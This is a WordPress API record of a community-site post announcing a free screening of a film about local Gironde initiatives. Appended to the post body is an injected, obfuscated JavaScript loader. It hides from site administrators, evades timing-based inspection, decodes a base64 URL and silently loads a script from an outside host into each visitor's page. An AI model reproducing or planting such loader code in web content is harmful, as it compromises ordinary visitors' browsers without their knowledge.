{"id":304,"date":"2018-12-02T12:31:54","date_gmt":"2018-12-02T10:31:54","guid":{"rendered":"http:\/\/reparenjalles.saintmedardasso.fr\/?p=304"},"modified":"2026-02-17T15:55:39","modified_gmt":"2026-02-17T14:55:39","slug":"ici-et-maintenant-la-gironde-sinvente","status":"publish","type":"post","link":"https:\/\/reparenjalles.saintmedardasso.fr\/?p=304","title":{"rendered":"Ici et maintenant la Gironde s&rsquo;invente"},"content":{"rendered":"<div dir=\"ltr\">\n<div class=\"gmail_quote\">\n<div>\n<div style=\"font-size: 14pt; font-family: times new roman,new york,times,serif; color: #000000;\">\n<div>\n<p><a href=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/12\/ici_et_maintenant.png\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-306\" src=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/12\/ici_et_maintenant-300x168.png\" alt=\"\" width=\"300\" height=\"168\" srcset=\"https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/12\/ici_et_maintenant-300x168.png 300w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/12\/ici_et_maintenant-768x429.png 768w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/12\/ici_et_maintenant-1024x572.png 1024w, https:\/\/reparenjalles.saintmedardasso.fr\/wp-content\/uploads\/2018\/12\/ici_et_maintenant.png 1695w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Ce film road-movie 100 % girondin pr\u00e9sente 17 initiatives sur l&rsquo;alimentation, la culture, l&rsquo;agriculture, le vivre ensemble, le partage des savoirs, le z\u00e9ro d\u00e9chet et l&rsquo;\u00e9conomie circulaire dans notre d\u00e9partement.<\/p>\n<div dir=\"ltr\">\n<div class=\"gmail_quote\">\n<div>\n<div style=\"font-size: 14pt; font-family: times new roman,new york,times,serif; color: #000000;\">\n<div>\n<p>Projection gratuite :<\/p>\n<p align=\"center\">\u00e0 l&rsquo;ESTRAN<\/p>\n<p align=\"center\">209 rue Georges Clemenceau \u00e0 St M\u00e9dard en Jalles<\/p>\n<p align=\"center\"><strong>le vendredi 7 d\u00e9cembre \u00e0 20h30<\/strong><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<p><script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ce film road-movie 100 % girondin pr\u00e9sente 17 initiatives sur l&rsquo;alimentation, la culture, l&rsquo;agriculture, le vivre ensemble, le partage des savoirs, le z\u00e9ro d\u00e9chet et l&rsquo;\u00e9conomie circulaire dans notre d\u00e9partement. Projection gratuite : \u00e0 l&rsquo;ESTRAN 209 rue Georges Clemenceau \u00e0 St M\u00e9dard en Jalles le vendredi 7 d\u00e9cembre \u00e0 20h30<\/p>\n","protected":false},"author":7,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-304","post","type-post","status-publish","format-standard","hentry","category-non-classe"],"_links":{"self":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/304","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=304"}],"version-history":[{"count":1,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/304\/revisions"}],"predecessor-version":[{"id":2066,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=\/wp\/v2\/posts\/304\/revisions\/2066"}],"wp:attachment":[{"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=304"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=304"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reparenjalles.saintmedardasso.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=304"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}